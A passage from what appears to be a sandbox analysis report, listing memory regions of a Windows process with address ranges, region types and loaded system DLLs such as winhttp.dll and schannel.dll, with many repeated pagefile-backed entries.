monitored = 0 entry_point = 0x7079f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1170 start_va = 0x72100000 end_va = 0x7214efff monitored = 0 entry_point = 0x7210d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1171 start_va = 0x75250000 end_va = 0x75256fff monitored = 0 entry_point = 0x75251e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1172 start_va = 0x70750000 end_va = 0x70757fff monitored = 0 entry_point = 0x70751fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1173 start_va = 0x72070000 end_va = 0x720f3fff monitored = 0 entry_point = 0x72096530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1174 start_va = 0x70a40000 end_va = 0x70bbdfff monitored = 0 entry_point = 0x70abc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1175 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 1176 start_va = 0x71fe0000 end_va = 0x72026fff monitored = 0 entry_point = 0x71ff58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1177 start_va = 0x31f0000 end_va = 0x322ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 1178 start_va = 0x3230000 end_va = 0x332ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 1179 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1180 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 1181 start_va = 0x2a30000 end_va = 0x2a3dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 1182 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1183 start_va = 0x2a40000 end_va = 0x2a46fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Region: id = 1184 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1185 start_va = 0x2a40000 end_va = 0x2a42fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Region: id = 1186 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 1187 start_va = 0x2a40000 end_va = 0x2a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 1413 start_va = 0x72030000 end_va = 0x72037fff monitored = 0 entry_point = 0x72031920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1414 start_va = 0x2990000 end_va = 0x2997fff monitored = 0 entry_point = 0x29919c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1415 start_va = 0x3330000 end_va = 0x372afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003330000" filename = "" Region: id = 1416 start_va = 0x70580000 end_va = 0x705e3fff monitored = 0 entry_point = 0x7059afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1417 start_va = 0x2990000 end_va = 0x2991fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1418 start_va = 0x70570000 end_va = 0x7057ffff monitored = 0 entry_point = 0x70574600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1419 start_va = 0x70520000 end_va = 0x7054bfff monitored = 0 entry_point = 0x7053bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1420 start_va = 0x70550000 end_va = 0x7056ffff monitored = 0 entry_point = 0x7055d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1421 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1422 start_va = 0x704f0000 end_va = 0x704f7fff monitored = 0 entry_point = 0x704f1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1423 start_va = 0x778a0000 end_va = 0x778e1fff monitored = 0 entry_point = 0x778b6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1424 start_va = 0x704d0000 end_va = 0x704e2fff monitored = 0 entry_point = 0x704d9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1425 start_va = 0x704a0000 end_va = 0x704cefff monitored = 0 entry_point = 0x704b95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1426 start_va = 0x3730000 end_va = 0x376ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 1427 start_va = 0x3770000 end_va = 0x386ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1428 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1429 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 1430 start_va = 0x2a30000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 1431 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1432 start_va = 0x2a40000 end_va = 0x2a47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Region: id = 1433 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1434 start_va = 0x2a40000 end_va = 0x2a42fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Region: id = 1435 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 1436 start_va = 0x2a40000 end_va = 0x2a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 1679 start_va = 0x70500000 end_va = 0x70519fff monitored = 0 entry_point = 0x7050fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1683 start_va = 0x3870000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1685 start_va = 0x2a30000 end_va = 0x2a40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1687 start_va = 0x3970000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 1688 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1689 start_va = 0x3ca0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 1690 start_va = 0x3b70000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b70000" filename = "" Region: id = 1691 start_va = 0x3c70000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 1692 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1693 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1694 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1695 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1696 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1697 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1698 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1699 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1700 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1701 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1702 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1703 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1704 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1705 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1706 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1707 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1708 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1709 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1710 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1711 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1712 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1713 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1714 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1715 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1716 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1717 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1718 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1719 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1720 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1721 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1722 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1723 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1724 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1725 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1726 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1727 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1728 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1729 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1730 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1731 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1732 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1733 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1734 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1735 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1736 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1737 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1738 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1739 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1740 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1741 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1742 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1743 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1744 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1745 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1746 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1747 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1748 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1749 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1750 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1751 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1752 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1753 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1754 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1755 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1756 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1757 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1758 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1759 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1760 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1761 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1762 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1763 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1764 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1765 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1766 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1767 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1768 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1769 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1770 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1771 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1772 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1773 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1774 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1775 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1776 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1777 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1778 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1779 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1780 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1781 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1782 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1783 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1784 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1785 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1786 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1787 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1788 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1789 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1790 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1791 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1792 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1793 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1794 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1795 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1796 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1797 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1798 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1799 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1800 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1801 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1802 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1803 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1804 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1805 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1806 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1807 start_va = 0x3c70000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 1808 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1809 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1810 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1811 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1812 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1813 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1814 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1815 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1816 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 